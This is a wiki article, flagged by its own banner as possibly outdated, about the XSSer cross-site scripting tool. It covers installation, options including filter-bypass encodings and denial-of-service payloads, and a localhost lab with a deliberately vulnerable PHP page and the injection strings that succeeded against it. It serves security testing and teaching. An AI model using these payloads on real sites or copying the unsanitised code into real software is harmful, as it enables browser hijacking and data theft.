XSSer

From aldeid
Jump to: navigation, search
Outdated.png
THIS ARTICLE MAY BE OUTDATED.
This article could be partially or completely outdated and needs to be updated. Thank you for your comprehension.

Description

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Version 1.0 of XSSer is known as "The Mosquito" and is written by psy (0x3CAA25B3 ;-).

Installation

Prerequisites

$ sudo apt-get install python \
  python-pycurl \
  python-beautifulsoup \
  python-libxml2

Installation of XSSer

Simple download

$ cd /data/src/
$ wget http://downloads.sourceforge.net/project/xsser/xsser-1.0.tar.gz
$ mkdir -p /pentest/web/
$ tar xvzf xsser-1.0.tar.gz -C /pentest/web/

Subversion

$ mkdir -p /pentest/web/
$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
$ chmod +x xsser/XSSer.py

Usage

Syntax

$ ./XSSer.py [OPTIONS] [-u <url> |-i <file> |-d <dork>]
  [-g <get> |-p <post> |-c <crawl>] [Request(s)] [Vector(s)]
  [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options

Common

--version
show program's version number and exit
-h, --help
show this help message and exit
-v, --verbose
verbose (default: no)
-s
show statistics with all injection attempts responses
-w
output all results directly to template (XSSlist.dat)
--xml=<filexml>
output 'positives' to aXML file (--xml filename.xml)
--publish
output 'positives' to Social Networks (identi.ca)
--short=<shorturls>
output -final code- shortered (tinyurl, is.gd)
--imx=<IMX>
create a false image with XSS code embedded
--fla=<FLASH>
create a false .swf file with XSS code embedded
--check
send a hash to pre-check if target repeats all content received (usefull to reduce 'false positive' results)
--launch
launch a browser at the end, with each 'positive' final code injection(s) discovered

Select Target(s)

At least one of these options has to be specified to set the source to get target(s) urls from. You need to choose to run XSSer:

-u <URL>, --url=<URL>
Enter target(s) to audit
-i <READFILE>
Read target urls from a file
-d <DORK>
Process search engine dork results as target urls
--De=<DORK_ENGINE>
Search engine to use for dorking (duck, altavista, bing, baidu, yandex, yebol, youdao, google, yahoo)

Select type of HTTP/HTTPS Connection(s)

These options can be used to specify which parameter(s) we want to use like payload to inject code.

-g <GETDATA>
Enter payload to audit using GET. (ex: '/menu.php?q=')
-p <POSTDATA>
Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c <CRAWLING>
Crawl target hierarchy parameters (can be slow!)
--Cw=<CRAWLER_WIDTH>
Number of urls to visit when crawling (deeping level)

Configure Request(s)

These options can be used to specify how to connect to target(s) payload(s). You can select multiple:

--cookie=<COOKIE>
Change your HTTP Cookie header
--user-agent=<AGENT>
Change your HTTP User-Agent header (default SPOOFED)
--referer=<REFERER>
Use another HTTP Referer header (default NONE)
--headers=<HEADERS>
Extra HTTP headers newline separated
--auth-type=<ATYPE>
HTTP Authentication type (value Basic or Digest)
--auth-cred=<ACRED>
HTTP Authentication credentials (value name:password)
--proxy=<PROXY>
Use proxy server (tor: http://localhost:8118)
--timeout=<TIMEOUT>
Select your Timeout (default 30)
--delay=<DELAY>
Delay in seconds between each HTTP request (default 8)
--threads=<THREADS>
Maximum number of concurrent HTTP requests (default 1)
--retries=<RETRIES>
Retries when the connection timeouts (default 3)

Select Vector(s)

These options can be used to specify a XSS vector source code to inject in each payload. Important, if you don't want to try to inject a common XSS vector, used by default. Choose only one option:

--payload=<SCRIPT>
OWN: Insert your XSS construction -manually-
--auto
AUTO: Insert XSSer 'reported' vectors from file

Select Bypasser(s)

These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it. Also, can be combined with other techniques to provide encoding:

--Str
Use method String.FromCharCode()
--Une
Use function Unescape()
--Mix
Mix String.FromCharCode() and Unescape()
--Dec
Use Decimal encoding
--Hex
Use Hexadecimal encoding
--Hes
Use Hexadecimal encoding, with semicolons
--Dwo
Encode vectors IP addresses in DWORD
--Doo
Encode vectors IP addresses in Octal
--Cem=<CEM>
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

Special Technique(s)

These options can be used to try to inject code using different type of XSS techniques. You can select multiple:

--Coo
COO - Cross Site Scripting Cookie injection
--Xsa
XSA - Cross Site Agent Scripting
--Xsr
XSR - Cross Site Referer Scripting
--Dcp
DCP - Data Control Protocol injections
--Dom
DOM - Use Anchor Stealth (DOM shadows! No server logging!)

Select Final injection(s)

These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities. Choose only one option:

--Fp=<FINALPAYLOAD>
OWN: Insert your final code to inject -manually-
--Fr=<FINALREMOTE>
REMOTE: Insert your final code to inject -remotely-
--B64
B64: Base64 code encoding in META tag (rfc2397)
--Dos
DOS: XSS Denial of service (client) attack!!

Special Final injection(s)

These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code:

--Onm
ONM: Use onMouseMove() event to inject code
--Ifr
IFR: Use <iframe> source tag to inject code

Examples

Proof of Concept

Code

This example shows the simplest form of usage for XSSer:

$ ./XSSer.py -u "http://127.0.0.1" -g "poc/XSS/index.php?xss=1" --auto

The following code is vulnerable to non-persistent (also called reflected) XSS attacks. Indeed, used with default value of secmode=0, user input (field "xss") is not sanitized before being displayed.

<html>
<head>
<title>Non persistent (reflected) XSS</title>
</head>
<body>
<?php
$secmode = 0;
// 0 = Nothing (no sec :)
// 1 = Remove "<" and ">"
// 2 = Remove "<script|SCRIPT>" and "</script|SCRIPT>"
// 3 = Remove "script|SCRIPT"
if(isset($_GET["xss"])) {
  switch($secmode) {
    case 3: $ban = array("script"); break;
    case 2: $ban = array("<script>", "</script>"); break;
    case 1: $ban = array("<", ">"); break;
    case 0: $ban = ""; break;
  }
  $out = str_ireplace($ban, "", $_GET["xss"]);
  echo("<b>(SANITIZED) CONTENT: </b>");
  echo('<div style="border: solid 2px #ff0000; color: #ff0000; font-weight:bold;">'.$out.'</div>');
}
?>
<hr />
<form method="get" action="index.php">
  <input type="text" style="width:200px" name="xss" />
  <input type="submit" />
</form>
</body>
</html>

Xsser-poc-001.png

Results

Here are the results of XSSer run against this code, using different values of secmode. It tests the replacement of some strings from user inputs before displaying it.

Secmode 0

secmode 0
Sanitize filter Nothing (no sec :)
Results
  • Injections: 82
  • Failed: 73
  • Sucessfull: 9
  • Accur: 10 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1<<SCRIPT>alert("XSS");//<</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
  • http://127.0.0.1/poc/XSS/index.php?xss=1<SCRIPT>alert(/XSS/.source)</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1</TITLE><SCRIPT>alert("XSS");</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1<SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
  • http://127.0.0.1/poc/XSS/index.php?xss=1<style></script>
  • http://127.0.0.1/poc/XSS/index.php?xss=1![CDATA[</script>
  • http://127.0.0.1/poc/XSS/index.php?xss=1[?][?]script>alert('XSS');[?][?]/script>
  • http://127.0.0.1/poc/XSS/index.php?xss=1</TITLE><SCRIPT>alert("XSS");</SCRIPT>

Secmode 1

secmode 1
Sanitize filter Remove "<" and ">"
Results
  • Failed: 81
  • Sucessfull: 1
  • Accur: 1 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
Info.png
Note
Notice the double slash (//) at the end of the payload. This vector enables to escape JavaScript escapes.

Secmode 2

secmode 2
Sanitize filter Remove "<script>", "<SCRIPT>", "</script>" and "</SCRIPT>"
Results
  • Failed: 80
  • Sucessfull: 2
  • Accur: 2 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//
  • http://127.0.0.1/poc/XSS/index.php?xss=1[?][?]script>alert('XSS');[?][?]/script>

Secmode 3

secmode 3
Sanitize filter Remove "script" and "SCRIPT"
Results
  • Failed: 81
  • Sucessfull: 1
  • Accur: 1 %
Injection points
  • http://127.0.0.1/poc/XSS/index.php?xss=1";alert('XSS');//

Advanced examples

Manual payload

 $ ./XSSer.py -u "http://127.0.0.1" -g "poc/xss/index.php?xss=" \
   --payload "<script>document.location='http://www.google.com'</script>"
===========================================================================

XSSer v1.0: "The Mosquito" // (2010) - (Copyright - GPLv3.0) // by psy

===========================================================================
Testing [XSS from URL] injections... you have your target good defined ;)
===========================================================================

===========================================================================
Target: http://127.0.0.1 --> 2011-02-08 21:25:02.477776
===========================================================================

-------------------------
[+] Trying: http://127.0.0.1/poc/xss/index.php?xss=<script>document.location='http://www.google.com'</script>
[+] Browser Support: [manual_injection]
[+] Checking: url attack with <script>document.location='http://www.google.com'</script>... ok

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Sucessfull: 1
- Accur: 100 %

===========================================================================
[*] List of possible XSS injections:
===========================================================================

[I] Target: http://127.0.0.1
[+] Injection: http://127.0.0.1/poc/xss/index.php?xss=<script>document.location='http://www.google.com'</script>
[-] Method: manual
--------------------------------------------------

Go further

All these links have been taken from the official site:

For more information, visit the official website: http://xsser.sourceforge.net/

Comments

Talk:XSSer